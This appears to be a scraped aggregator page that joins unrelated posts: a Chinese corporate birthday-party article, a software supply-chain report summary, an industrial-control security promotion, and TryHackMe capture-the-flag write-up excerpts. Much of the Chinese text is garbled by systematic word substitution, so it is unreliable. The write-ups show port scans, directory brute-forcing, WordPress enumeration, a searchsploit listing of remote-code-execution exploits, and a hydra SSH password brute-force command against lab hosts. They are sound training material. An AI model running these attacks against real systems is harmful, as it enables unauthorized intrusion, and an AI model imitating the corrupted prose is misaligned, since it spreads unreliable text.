灵动生日会丨奔波在酷爱里,有你是欢喜 原创 Linden灵动 Linden灵动 9-17 2021.9.17 | 农历八月十一 | 周五 工夫不能带走两样货色,一个是跟本人相处的能力,一个是跟我各自为政的人,咱们独立,在本人的路线上奋斗,彼此看一下都是安全感。 ——卢思浩 业余专一 共建共赢 润物无声 关心总在不经意间到达 撩动了心弦,和煦着心扉 生日如期而至,打动萍水相逢。这个金秋九月,灵动员工生日会暨中秋流动惊喜来袭~ 9月17日上午,灵动为八名第三季度过生日的小伙伴特地安顿了一场生日趴,精心安排的场地里,整体员工欢聚在一起,用专属蛋糕和零食礼包,送上最真挚的生日祝愿。 灵动联结创始人&副总裁吴杰发表生日会正式开始,并为寿星们送上了舒适的祝愿。他示意,生日会是企业文化建设的重要一环,感激大家辛勤付出,公司的倒退离不开大家的共同努力,今后的生存中,心愿大家工作顺利,身体健康。 吴总送上生日祝愿~ 游戏时光,美妙共享。为了让高兴加倍,气氛到位,生日会现场设置了一系列游戏与惊喜,从集体战的抢凳子,到为了团队而战的你比我猜,参加激情满满,欢声笑语一直。 拼反应速度的时候到了~ 相亲相爱一家人~ 放松生存,也不忘工作。在你比我猜环节,灵动小伙伴们也没丢下本人的业余能力,每到与业务非亲非故的词语,答题的效率都快了起来。又犯起“职业病”的小伙伴们,能够称得上是最强“打工人”了。 手脚并用,你来比划我来猜~ 生日会的最初,随同着生日歌缓缓响起,寿星们一起吹灭蜡烛,许下生日欲望,真挚的祝愿与此刻的欢畅,都被定格在影像之中。 蛋糕富丽退场啦~ 生日快乐歌唱起来~ 寿星们一起切蛋糕喽! 生日是成长路上的一个个足迹,特地的灵动生日会,记录着小伙伴们的成长,也在通知大家,奋斗的时光里,总有人常伴左右,给予关怀与反对。 无数个你变成「咱们」,「咱们」在的中央就有家,We are family。 灵动始终致力于打造和煦有爱、容纳团结的小家庭,给小伙伴们一个衰弱、轻松、谐和的工作环境,让灵动人的工作生涯随同着有限关爱。 每一次的生日会,都倾泻了灵动对员工的关心,以及对员工长久以来致力付出的感激和必定。生日会不仅仅是一场团聚,更是构建灵动谐和、团结小家庭的重要桥梁。 生存中的那些人,那些事,那些林林总总,有欢笑与打动,有惊喜与播种,足以让人粗浅铭刻。一句生日快乐,蕴藏着灵动人满满的祝愿,简略却不枯燥;难忘的生日会,折射出在一起的每一个舒适时刻,收藏你我心底。 相遇相识 相伴 温情与厚爱不变 在此祝福小伙伴们生日快乐 祝福所有灵动人好景有限 祝福灵动岁岁蓬勃! 灵动有你,将来可期! 同心同行的咱们 将来要持续独特奔波在酷爱里 共建团队凝聚力与离心力 用奋斗走向美妙的今天! 恰逢中秋佳节到来之际 灵动也恭祝大家节日快乐 事事顺心,样样圆满!

September 23, 2021 · 1 min · jiezi

关于安全:TryhackmeOverpass前端代码绕过登录限制可编辑的hosts文件cron提权

服务发现┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.74.226 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-22 02:33 EDTNmap scan report for 10.10.74.226Host is up (0.31s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 23.95 secondsweb目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 -u http://10.10.74.226 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-22_02-36-52.logTarget: http://10.10.74.226[02:36:53] Starting: [02:36:54] 301 - 0B - /img -> img/[02:36:54] 200 - 2KB - / [02:36:54] 301 - 0B - /downloads -> downloads/[02:36:55] 301 - 0B - /aboutus -> aboutus/[02:36:55] 301 - 42B - /admin -> /admin/[02:36:56] 301 - 0B - /css -> css/ web站点剖析首页是一个明码软件的介绍页面首页源代码有一行正文: Yeah right, just because the Romans used it doesn't make it military grade, change this? ...

September 22, 2021 · 4 min · jiezi

关于安全:2021-年软件供应链状况报告发布开源需求增长73开源攻击暴涨-650

近日,Sonatype 公布了最新的 “2021 年软件供应链情况报告”。该报告数据显示,开源供给、需要和安全漏洞全副呈现出“爆炸性”增长,其中开源供应量减少了 20%,开源需要减少了 73%,开源攻打也随之暴涨 650%。 本次报告,通过对 10 万个生产利用、 400 万个由开发者进行的组件迁徙,以及与 Java(Maven Central)、JavaScript(npmjs)、Python(PyPI)和 .Net(nuget)生态系统相干的供给、需要和平安趋势进行了钻研,从而得出了以下一些亮点。 开源供给、需要和安全漏洞均出现“爆炸性”增长 据 Sonatype 报告显示,过来的一年里,开源供给、开源需要和开源安全漏洞的数据,均呈现出了“爆炸性”增长。详细情况如下: (1)供应量减少了 20%。过来的一年里,四大开源生态系统公布了 6,302,733 个新版本的组件/包,推出了 723,570 个全新我的项目,寰球 2700 万开发人员参加其中。截止目前,四大开源生态系统的组件/包总数曾经达到了 37,451,682 个。 (2)需要减少了 73%。2021 年,世界各地的开发者将从四大生态系统下载超过 2.2 万亿个开源软件包。 (3)随着开源下载量的减少,开源攻打也随之减少了 650%。2021 年,全世界见证了旨在利用上游开源生态系统弱点的软件供应链攻打呈指数级增长。 (4)生产应用程序仅利用可用开源我的项目的6%。只管有大量可用的开源我的项目,但目前的利用率仅集中在多数受欢迎的我的项目上。 (5)受欢迎的开源我的项目更容易受到攻打。数据显示,目前 29% 的风行我的项目版本至多蕴含一个已知的安全漏洞;反之,仅 6.5% 的非风行我的项目版本是这样。这一数据表明,平安钻研人员们(blackhat 和 whitehat)更专一于使用率较高的我的项目。 开源破绽的密度按生态系统散布 本次 Sonatype 公布的钻研表明,只管开发人员对开放源码的需要持续呈指数级增长,但理论应用的开放源码总量仍旧非常少。 在目前比拟风行我的项目中,其蕴含的破绽的我的项目远超失常比例。Sonatype 指出,以上这一事实,为我的项目领导者点明了现阶段的重要责任和时机——拥抱智能自动化,这能够让他们在最佳开源供应商的根底上实现标准化,同时帮忙开发人员放弃第三方库和最佳版本的更新。 更新迭代快、受欢迎水平低的开源我的项目更平安 Sonatype 报告数据显示,相比其余一些我的项目,均匀更新工夫(MTTU)更快的开源我的项目被发现有破绽的可能性升高了 1.8 倍,因而这样的我的项目会更平安一些。 另外,我的项目的受欢迎水平,并不能很好地预测该项目标安全性。一般而言,比拟风行的开源我的项目,其所蕴含破绽的可能性是一般我的项目的 2.8 倍。 开发团队间的依赖关系治理实际差别较大 数据显示,在开源软件供应链中,软件开发人员在更新第三方依赖项时,69% 的工夫会做出次优抉择。一般而言,更新版本的我的项目会更好,但并非都是最好的。 因为商业工程团队仅治理了所应用组件的 25% ,这使得他们大多数开源的依赖关系比拟过期,且容易受到更大平安危险的影响。 ...

September 19, 2021 · 1 min · jiezi

关于安全:TryhackmeBlog登录爆破图片隐写ltrace程序流跟踪SUID提权

绑定域名echo "10.10.122.108 blog.thm" >>/etc/hosts 服务发现┌──(rootkali)-[~/tryhackme]└─# nmap -sV -Pn 10.10.122.108 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 06:05 EDTNmap scan report for 10.10.122.108Host is up (0.31s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 41.55 seconds看首页应该是一个wordpress站点,wpscan枚举这个站点信息,确认wp版本5.0┌──(rootkali)-[~/tryhackme]└─# wpscan --url http://10.10.122.108 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[+] URL: http://10.10.122.108/ [10.10.122.108][+] Started: Fri Sep 17 06:09:45 2021Interesting Finding(s):[+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100%[+] robots.txt found: http://10.10.122.108/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.122.108/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] WordPress readme found: http://10.10.122.108/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%[+] Upload directory has listing enabled: http://10.10.122.108/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.122.108/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06). | Found By: Emoji Settings (Passive Detection) | - http://10.10.122.108/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0' | Confirmed By: Meta Generator (Passive Detection) | - http://10.10.122.108/, Match: 'WordPress 5.0'[i] The main theme could not be detected.[+] Enumerating All Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:10 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:10[i] No Config Backups Found.[!] No WPScan API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register[+] Finished: Fri Sep 17 06:10:08 2021[+] Requests Done: 165[+] Cached Requests: 5[+] Data Sent: 40.466 KB[+] Data Received: 191.523 KB[+] Memory used: 179.738 MB[+] Elapsed time: 00:00:23wordpress 5.0版本存在一个近程执行破绽──(rootkali)-[~]└─# searchsploit wordpress 5.0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------WordPress 5.0.0 - Image Remote Code Execution | php/webapps/49512.pyWordPress Core 5.0 - Remote Code Execution | php/webapps/46511.jsWordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) | php/remote/46662.rb看exp须要账号和明码,那么当初须要做的是确定账号和明码是什么 ...

September 18, 2021 · 9 min · jiezi

关于安全:九月第三周基于关键保护条例构建石油石化的立体安全体系

9月1日,《要害信息基础设施平安爱护条例》实施。要害信息基础设施是指公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务、国防科技工业等重要行业和畛域的,以及其余一旦受到毁坏、丢失性能或者数据泄露,可能严重危害国家平安、国计民生、公共利益的重要网络设施、信息系统等。 要害信息基础设施是经济社会运行的神经中枢,是网络安全的重中之重。保障要害信息基础设施的平安,对于保护国家网络安全、网络空间主权和国家平安、保障经济社会衰弱倒退、保护公共利益和公民合法权益都具备非常重大的意义。 石油化工的工控零碎是能源行业重要的要害信息基础设施,信息化建设有了较好的根底,并且已深度交融到各个生产业务零碎中。随着“两化交融”、生产安装规模不断扩大,越来越多的生产控制系统通过信息网络连接到互联网上,石油石化的工控零碎面临微小的危险挑战。 石油石化工控的现状与挑战在石油石化行业中,工控零碎(ICS)在油气田、炼油化工等次要生产环节失去广泛应用,蕴含分布式控制系统(DCS)、监控与数据采集零碎(SCADA)和可编程逻辑控制器(PLC)等。 在工油气田生产中,工艺解决安装较多的油气处理厂多采纳DCS 零碎或大型 PLC 零碎实现生产工艺过程的管制,工艺解决安装少的油气解决站多采纳中小型 PLC 零碎,井口扩散的油气采掘厂大多采纳近程管制终端(RTU)。 在炼油化工生产中,DCS 零碎负责各类大型生产安装的根本过程管制、操作、监督、治理,顺序控制、工艺联锁等,PLC则用于可燃/有毒气体检测零碎、压缩机控制系统、转动设施监视系统等管制。 原先的工控零碎的设计次要是专用的绝对关闭可信的通信线路,也就是关闭的“单机零碎”。随着“两化交融”带来工业控制系统外连,以及生产网络内底层计算技术、网络技术的更新,使得内网单机开始联网,这就对以后防护技术的性能、性能提出了不同于传统技术的平安要求。这种工业网络规模、工业数据量的变动,对传统的隔离、检测、对立治理的防护逻辑带来挑战。 综合来看,石油石化企业的工控零碎存在技术、设施和治理上三方面的危险隐患。 技术上的危险隐患。无论是工控零碎,还是应用工业主机、服务器等,存在大量老旧且利用门槛低的破绽,不仅长期未被发现和修复,并且有大量全新的0DAY破绽。这些“带病运行”的软件和设施给石油石化企业带来微小安全隐患。设施上的危险隐患。工业设施资产散布广、设施类型繁多,不仅面临生产故障、设施老化等危险,在不能无效平安配置下,更加剧了各类设施、软件的软弱水平,让攻击行为难以觉察。治理上的危险隐患。工控系统安全波及于自动化、信息化和平安等不同部门和不同岗位,彼此穿插。企业原有的平安制度与现状不适应,进而导致平安组织态度含糊,责任不明确。而且企业之间、部门之间存在认知偏差,技术生产的壁垒,“孤岛”景象重大,导致投入的设施与零碎效劳大打折扣,无奈匹配上高速生产程度,进而影响业务经营效率。隔靴搔痒,打造平面的工控平安体系石油石化须要从单点的、本地的、部分的工控平安防护体系,降级为一个平面的、全方位的、纵深的、全面的平安防控体系。同时,晋升企业的布局治理、人员业余意识和技能,与设施应用、生产运维、应急响应、事件处理等完满联合,无效防备各类工控危险。 全面体检,及时把握工控系统安全现状《要害信息基础设施平安爱护条例》第十七条规定:运营者该当自行或者委托网络安全服务机构对要害信息基础设施每年至多进行一次网络安全检测和危险评估,对发现的平安问题及时整改,并依照爱护工作部门要求报送状况。 每年一次的平安检测和危险评估,可能对石油石化工控系统进行全面的“体检”,发现各类潜在攻打和未知威逼,将威逼扼杀在晚期或萌芽状态,将危险防备的关口前移,从而晋升企业整体的安全性。 顶象洞见实验室致力于工控平安深度攻防技术钻研,次要面向底层工控设施和安装( PLC、DCS、SCADA等)以及各类组态软件的破绽开掘和平安钻研,基于当先的工业系统漏洞开掘与利用、破绽含糊测试和工业协定剖析技术,为国内外数十家出名工业企业提供过平安检测服务。 顶象OT-Argus通过集成自主研发的非入侵式无损智能破绽扫描零碎,联合集成的4000+种工控破绽,1000+种独家开掘的0DAY破绽,50000+种IT破绽检测扫描插件,全面笼罩IT/OT破绽检测。对设施进行完整性、脆弱性、安全性进行全面检测与评估,晋升设施的安全性、可靠性和稳定性。 两手筹备,防备已知威逼和正在产生的攻打《要害信息基础设施平安爱护条例》第十五条第三、六、七款,对负责本单位要害信息基础设施平安爱护的工作人员并给出明确规定:(三)依照国家及行业网络安全事件应急预案,制订本单位应急预案,定期发展应急演练,处理网络安全事件;(六)履行个人信息和数据安全爱护责任,建立健全个人信息和数据安全爱护制度;(七)对要害信息基础设施设计、建设、运行、保护等服务施行平安治理。 破绽是危险的暴发源头,无论是病毒攻打还是网络攻击大多是基于破绽。CNVD(国家信息安全破绽共享平台)显示,2021 上半年新增的工业控制系统破绽数量达到 151 个,波及制造业、能源、交通等行业。及时修复工控零碎存在的各类已知破绽,无效防备病毒威逼;同时“诱捕”拦挡已产生的攻打,良好保障业务平安。 顶象OT-Guard独有的“虚构补丁”技术,可能主动生成基于已知和未知破绽的针对性防护策略,实时监控各类工控破绽攻打,阻断各类威逼。石油石化企业不依赖设施厂家降级和修复、无需业余人员手动操作,也能够实现未知缺点动静修复的解决方案。该计划修复性能齐全可逆可追溯,确保生产环境齐全可控。 顶象OT-Phantom第三代的坑骗诱捕技术可能自动化高度仿真海量的资产和业务,被动诱惑攻击者攻打仿真的“幻影零碎”,误导与蛊惑攻击者,减少攻打时效,通过应用坑骗进攻技术来挫败攻击者的探测过程。能够无效感知攻击者以及蠕虫病毒、木马等通过技术手段对系统进行针对性的攻击行为,具体察看记录攻打手法、入侵行为、拜访记录、威逼毁坏等,对被防护网络的攻打、异样事件进行实时预警。并通过实时的行为剖析,联合关联网络、智能模型建设和风控引擎,对攻击者进行疾速溯源和危险特征分析,帮忙运营者进行针对性进攻。该技术在每年的实战攻防演习失去充沛实践证明,目前已在多个企业落地。 防患未然,预知未知威逼和潜在被攻打危险2021年5月出版的《攻守道-企业数字业务平安危险与防备》一书,特地提到“未知攻,焉知防”:企业具体理解并把握有哪些危险、危险有哪些特色、危险来自哪里,才可能无效预防,此所谓“知己知彼百战不殆”。 石油石化企业须要及时发现并把握各类异样行为、危险隐患及故障隐患,通过事先应答或打消,保障工控零碎的平安,保障业务的连续性。同时,基于业务零碎的大数据,构建威逼模型,可能帮忙石油石化企业预测内外部和主观因素下的偶尔与必然结果,为可能产生安全事件提供决策撑持。 顶象通过有监督和无监督的机器学习威逼行为建模,可能对工控零碎中的行为进行主动聚类与分类,精准辨认网络内的失常和异样行为,发现各类潜在攻打和未知威逼,晋升网络和设施的平安检测后果,帮助平安运维人员将威逼毁灭在萌芽状态,进一步晋升整体的安全性。 顶象OT-Eye基于常识图谱技术,买通不同档次的危险数据,实现危险的对立的采集、汇聚、交融与关联。联合外部和内部危险常识,深刻开掘剖析,造成独有的危险常识图谱。进而追溯危险起因和流传机制,实现危险的感知和预测,协同网内往外联防联控,帮忙平安人员制订更迷信无效的防护策略,让企业从被动进攻转为被动保障。 迷信布局与治理,晋升团队效力与人员技能《要害信息基础设施平安爱护条例》第十四条规定:运营者该当建立健全网络安全爱护制度和责任制,保障人力、财力、物力投入。运营者的次要负责人对要害信息基础设施平安爱护负总责,领导要害信息基础设施平安爱护和重大网络安全事件处理工作,组织钻研解决重大网络安全问题。 第十五条第一、四、五款对负责本单位要害信息基础设施平安爱护的工作人员并给出具体规定:(一)建立健全网络安全治理、评估考核制度,拟订要害信息基础设施平安爱护打算;(四)认定网络安全要害岗位,组织发展网络安全工作考核,提出处分和表彰倡议;(五)组织网络安全教育、培训。 零碎的布局与迷信的治理、业余平安人才和深入人心的安全意识,能力让工控平安体系可能现业务与平安的有机联合,施展平安体系的价值,无效防控各类危险,及时响应并解决各类平安问题,保障业务稳固运行。 1,零碎的布局与迷信的管理制度。企业须要依据组织和业务特点,联合组织倒退和国家标准、监管机构要求确定工控平安指标和工控安全策略。同时,须要把握企业外部工控平安现状与工控平安指标之间差距,依照工控平安建设工作的不同参与者职责。从而建设设施治理、系统管理、运行保护、日志治理、脆弱性治理、安全事件治理、应急响应治理等规定和评估体系。为企业的工控平安工作提供领导和要求。2,深入人心的安全意识和习惯。很多安全事件的产生是因为非平安岗位人员的安全意识有余所导致的,企业须要通过宣讲、培训、比赛、演练等多种形式,晋升全员的安全意识,让每个员工建设良好的平安习惯,从而良好撑持平安保障体系建设,清晰了解并严格遵守平安管理制度,以无效保障工控零碎的平安运行。3,业余的平安常识与技能。石油石化平安岗位波及计算机、网络、平安、人工智能等多个畛域的专业技能。企业须要通过各类措施晋升平安岗位人员的专业知识和服务水平,良好满足平安治理、平安布局、平安施行、平安运维、应急响应等各阶段工作的要求。“全国信息安全标准化技术委员会”2021年颁布的《信息安全技术工业控制系统信息安全防护能力成熟度模型》,对负责工控零碎设计、建设、运维等相干方有一套全面的“平安能力成熟度模型”规范。该规范通过一系列代表能力和停顿的特色、 属性、批示或者模式,对平安能力因素、能力成熟度等级和能力建设过程等三个维度进行了零碎测验和评估。

September 18, 2021 · 1 min · jiezi

关于安全:TryhackmeWonderland信息泄露包含文件横向提权Capabilities提权

服务发现┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.86.51Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 02:41 EDTNmap scan report for 10.10.132.163Host is up (0.33s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 80.63 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u "http://10.10.132.163" -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-16_02-08-56.logTarget: http://10.10.132.163[02:08:56] Starting: [02:08:59] 301 - 0B - /img -> img/[02:09:00] 200 - 402B - / [02:09:00] 301 - 0B - /r -> r/ [02:10:24] 301 - 0B - /poem -> poem/ [02:10:34] 301 - 0B - /http%3A%2F%2Fwww -> /http:/www[02:12:54] 301 - 0B - /http%3A%2F%2Fyoutube -> /http:/youtube [02:13:49] 301 - 0B - /http%3A%2F%2Fblogs -> /http:/blogs [02:13:57] 301 - 0B - /http%3A%2F%2Fblog -> /http:/blog[02:14:39] 301 - 0B - /%2A%2Ahttp%3A%2F%2Fwww -> /%2A%2Ahttp:/www [02:21:21] 301 - 0B - /http%3A%2F%2Fcommunity -> /http:/community [02:21:58] 301 - 0B - /http%3A%2F%2Fradar -> /http:/radar [02:23:23] 301 - 0B - /http%3A%2F%2Fjeremiahgrossman -> /http:/jeremiahgrossman [02:23:23] 301 - 0B - /http%3A%2F%2Fweblog -> /http:/weblog[02:23:27] 301 - 0B - /http%3A%2F%2Fswik -> /http:/swikhttp://10.10.132.163/r是一行文字Keep Going."Would you tell me, please, which way I ought to go from here?"http://10.10.132.163/poem 是一首英文诗The Jabberwocky'Twas brillig, and the slithy tovesDid gyre and gimble in the wabe;All mimsy were the borogoves,And the mome raths outgrabe.“Beware the Jabberwock, my son!The jaws that bite, the claws that catch!Beware the Jubjub bird, and shunThe frumious Bandersnatch!”He took his vorpal sword in hand:Long time the manxome foe he sought —So rested he by the Tumtum tree,And stood awhile in thought.And as in uffish thought he stood,The Jabberwock, with eyes of flame,Came whiffling through the tulgey wood,And burbled as it came!One, two! One, two! And through and throughThe vorpal blade went snicker-snack!He left it dead, and with its headHe went galumphing back.“And hast thou slain the Jabberwock?Come to my arms, my beamish boy!O frabjous day! Callooh! Callay!”He chortled in his joy.‘Twas brillig, and the slithy tovesDid gyre and gimble in the wabe;All mimsy were the borogoves,And the mome raths outgrabe.给进去的hint是:Everything is upside down here. 发现img/下有三张图片,alice_door有一行英文,无论倒过去还是侧面看都看不出来写的是什么alice_door.jpgalice_door.pngwhite_rabbit_1.jpg谷歌搜寻可能是插画作者的落款,插画作者名字叫John Tenniel尝试以alice为用户名爆破ssh,连贯被reset了,看来不让爆sshhydra -l alice -P /usr/share/wordlists/rockyou.txt 10.10.86.51ssh -v ...

September 17, 2021 · 7 min · jiezi

关于安全:TryhackmeMr-Robot-CTF敏感信息泄露suid提权

服务发现┌──(rootkali)-[~/tryhackme/mrrobot]└─# nmap -sV -Pn 10.10.180.172 -p- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 02:33 EDTNmap scan report for 10.10.180.172Host is up (0.31s latency).Not shown: 65532 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd443/tcp open ssl/http Apache httpdService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 398.37 seconds查看http://10.10.180.172/robots.txt,显示两个文件User-agent: *fsocity.dickey-1-of-3.txt关上http://10.10.180.172/key-1-of...,找到key 1073403c8a58a1f80d943455fb30724b9fsocity.dic下载下来,像是一个字典文件,可能是登陆密码字典,那么当初须要的是一个可登陆的用户名?目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u "http://10.10.180.172" -e* -t 100 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100Error Log: /root/dirsearch/logs/errors-21-09-15_03-27-35.logTarget: http://10.10.180.172 [03:27:36] Starting: [03:29:13] 403 - 218B - /.user.ini [03:29:46] 301 - 0B - /0 -> http://10.10.180.172/0/ [03:31:19] 301 - 233B - /admin -> http://10.10.180.172/admin/ [03:31:39] 200 - 1KB - /admin/ [03:31:39] 403 - 224B - /admin/.htaccess[03:31:39] 200 - 1KB - /admin/?/login[03:31:43] 301 - 0B - /adm/index.php -> http://10.10.180.172/adm/[03:32:00] 200 - 1KB - /admin/index [03:32:00] 200 - 1KB - /admin/index.html[03:32:26] 301 - 0B - /admin/index.php -> http://10.10.180.172/admin/ [03:32:45] 301 - 0B - /admin2/index.php -> http://10.10.180.172/admin2/[03:33:01] 301 - 0B - /admin_area/index.php -> http://10.10.180.172/admin_area/[03:33:50] 301 - 0B - /adminarea/index.php -> http://10.10.180.172/adminarea/[03:34:37] 301 - 0B - /administrator/index.php -> http://10.10.180.172/administrator/[03:35:33] 301 - 0B - /apc/index.php -> http://10.10.180.172/apc/ [03:35:40] 301 - 233B - /audio -> http://10.10.180.172/audio/[03:36:05] 301 - 0B - /atom -> http://10.10.180.172/feed/atom/ [03:36:35] 301 - 232B - /blog -> http://10.10.180.172/blog/[03:36:38] 301 - 0B - /bb-admin/index.php -> http://10.10.180.172/bb-admin/[03:36:52] 301 - 0B - /bitrix/admin/index.php -> http://10.10.180.172/bitrix/admin/[03:37:46] 301 - 0B - /Citrix/AccessPlatform/auth/clientscripts/cookies.js -> http://10.10.180.172/Citrix/AccessPlatform/auth/clientscripts/cookies.js[03:38:36] 301 - 231B - /css -> http://10.10.180.172/css/ [03:40:26] 301 - 0B - /engine/classes/swfupload/swfupload.swf -> http://10.10.180.172/engine/classes/swfupload/swfupload.swf[03:40:27] 301 - 0B - /engine/classes/swfupload/swfupload_f9.swf -> http://10.10.180.172/engine/classes/swfupload/swfupload_f9.swf[03:40:42] 301 - 0B - /etc/lib/pChart2/examples/imageMap/index.php -> http://10.10.180.172/etc/lib/pChart2/examples/imageMap/[03:40:52] 301 - 0B - /extjs/resources/charts.swf -> http://10.10.180.172/extjs/resources/charts.swf[03:40:55] 200 - 0B - /favicon.ico [03:41:04] 301 - 0B - /feed -> http://10.10.180.172/feed/ [03:42:04] 301 - 234B - /images -> http://10.10.180.172/images/ [03:42:10] 301 - 0B - /html/js/misc/swfupload/swfupload.swf -> http://10.10.180.172/html/js/misc/swfupload/swfupload.swf[03:42:25] 200 - 1KB - /index.html [03:42:29] 301 - 0B - /image -> http://10.10.180.172/image/ [03:42:51] 301 - 0B - /index.php -> http://10.10.180.172/ [03:42:51] 200 - 504KB - /intro[03:42:52] 301 - 0B - /index.php/login/ -> http://10.10.180.172/login/[03:43:05] 301 - 230B - /js -> http://10.10.180.172/js/[03:43:31] 200 - 309B - /license.txt [03:44:22] 302 - 0B - /login -> http://10.10.180.172/wp-login.php [03:44:30] 302 - 0B - /login/ -> http://10.10.180.172/wp-login.php[03:45:10] 301 - 0B - /modelsearch/index.php -> http://10.10.180.172/modelsearch/[03:45:11] 301 - 0B - /myadmin/index.php -> http://10.10.180.172/myadmin/[03:45:19] 301 - 0B - /panel-administracion/index.php -> http://10.10.180.172/panel-administracion/[03:45:23] 403 - 94B - /phpmyadmin [03:45:53] 403 - 94B - /phpmyadmin/ [03:45:54] 403 - 94B - /phpmyadmin/scripts/setup.php [03:46:40] 301 - 0B - /pma/index.php -> http://10.10.180.172/pma/ [03:46:53] 200 - 64B - /readme [03:46:53] 200 - 64B - /readme.html[03:47:13] 200 - 41B - /robots.txt [03:47:42] 301 - 0B - /rss -> http://10.10.180.172/feed/[03:48:29] 200 - 0B - /sitemap [03:48:29] 200 - 0B - /sitemap.xml[03:48:30] 200 - 0B - /sitemap.xml.gz[03:48:53] 301 - 0B - /siteadmin/index.php -> http://10.10.180.172/siteadmin/[03:49:16] 301 - 0B - /sql/index.php -> http://10.10.180.172/sql/ [03:50:32] 301 - 0B - /templates/ja-helio-farsi/index.php -> http://10.10.180.172/templates/ja-helio-farsi/[03:50:33] 301 - 0B - /templates/rhuk_milkyway/index.php -> http://10.10.180.172/templates/rhuk_milkyway/[03:50:33] 301 - 0B - /templates/beez/index.php -> http://10.10.180.172/templates/beez/[03:50:59] 301 - 0B - /tmp/index.php -> http://10.10.180.172/tmp/ [03:52:05] 301 - 236B - /wp-admin -> http://10.10.180.172/wp-admin/[03:52:09] 301 - 238B - /wp-content -> http://10.10.180.172/wp-content/[03:52:10] 403 - 245B - /wp-content/plugins/akismet/admin.php[03:52:10] 